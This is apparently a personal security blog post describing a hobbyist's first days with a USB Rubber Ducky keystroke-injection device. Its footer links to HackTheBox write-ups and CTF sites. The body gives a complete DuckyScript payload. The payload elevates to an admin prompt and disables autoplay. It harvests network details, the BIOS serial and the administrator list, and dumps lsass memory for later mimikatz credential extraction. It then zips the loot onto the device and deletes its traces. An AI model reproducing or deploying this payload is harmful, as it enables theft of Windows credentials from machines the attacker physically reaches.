Skip to main content

General -Rubber Ducky

RubberDUcky


So I just got a rubber ducky and have been playing around with it


Here is some of my first couple of days

1st thing I did was import the lanugauge in Notepad++ to write my scripts in
you can find the xml file here (https://forums.hak5.org/topic/21045-encoder-duckyscript-notepad-userdefinedlanguage/)


I also set a custom console to compile the scripts using the duckencoder.jar

CD: C:\users\********\Desktop\Ducky
Current directory: C:\users\******\Desktop\Ducky
java -jar duckencoder.jar -i ipconfig -o inject.bin



I also changed the firmware to twin ducky so I can read/write to the SD card while running payload

https://forums.hak5.org/topic/28162-firmware-introducing-twin-duck/


My first little scrip I borrowed a bit from some other posts but i'm still not entirely happy with it

 REM *** UAC Bypass ***
DELAY 3000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 500
ALT y
DELAY 200

STRING reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers /v DisableAutoplay /t REG_DWORD /d 1 /f
ENTER
REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "_"') do set duck=%d
ENTER

DELAY 100
STRING RMdir /s /q %duck%\Finds
ENTER
DELAY 100
STRING set duckytemp=C:\Temp\Ducky
ENTER
DELAY 100
STRING mkdir C:\Temp\Ducky
ENTER
DELAY 100
STRING mkdir %duck%\Finds\%computername%
DELAY 100
ENTER
STRING set duckypath=%duck%\Finds\%computername%
ENTER
DELAY 100
STRING ipconfig /all > %duckytemp%\%computername%.ipconfig.txt
ENTER
DELAY 200
STRING wmic bios get serialnumber > %duckytemp%\%computername%.serial.txt
ENTER
DELAY 100
STRING net localgroup administrators > %duckytemp%\%computername%.admins.txt
ENTER
DELAY 100
STRING %duck%\procdump64.exe -accepteula -ma lsass.exe %duckytemp%\%computername%.lsass.dmp
ENTER
DELAY 3000
STRING %duck%\7za.exe a %duckytemp%\%computername%.7z %duckytemp%\*
ENTER
STRING
DELAY 5000
STRING rmdir /s /q %duckytemp%
ENTER
STRING exit
ENTER



So what I'm doing here is dumping the output of ipconfig /all, getting the serial number of the computer, getting a list of the admin users and dumping the lsass for decrypting with mimikatz later


I write these all to a temp directory on a computer, then zip them up and copy them to the flash drive........

the write speed is stupid slow so this isn't a great solution and take about 4 minutes to run completely

I think uploading the zip file to an external storage location is probably a better solution, I just don't have the time to do that right now



Comments

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar...

Hack The Box - Retired - Laboratory

HackTheBox - Laboratory - Retired Starting off with a quick scan using threader6000 /opt/threader3000/threader6000.py 10.10.10.216 Ports 22,80,443 came back. Run nmap against these ports. nmap -p22,80,443 -sV -sC -T4 -Pn -oN 10.10.10.216 10.10.10.216 nmap -p22,80,443 -sV -sC -Pn -T4 -oN 10.10.10.216 10.10.10.216 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-13 17:43 EDT Nmap scan report for laboratory.htb (10.10.10.216) Host is up (0.060s latency). PORT    STATE SERVICE  VERSION 22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA) |   256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA) |_  256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519) 80/tcp  open  http     Apache httpd 2.4.41 |_...

A collection of online Security CTF and Learning sites

 Hellbound Hackers    Embedded Security CTF Arizona Cyber Warfare Range Over The Wire - Bandit Pico CTF 2018 Hack The Box.eu Root Me: Challenges/Forensic RingZero CTF Vulnerable By Design - Vulnerable VMs Murder Mystery SQL Challenge Incident Response Challenge Authentication Lab Walkthroughs Defcon CTF Archives Matrix Holiday Hack Cyber Defenders | Blue Team and CTF Crypto Hack - learning Crypto Video Learning Zero to Hero Pentesting by The Cyber Mentor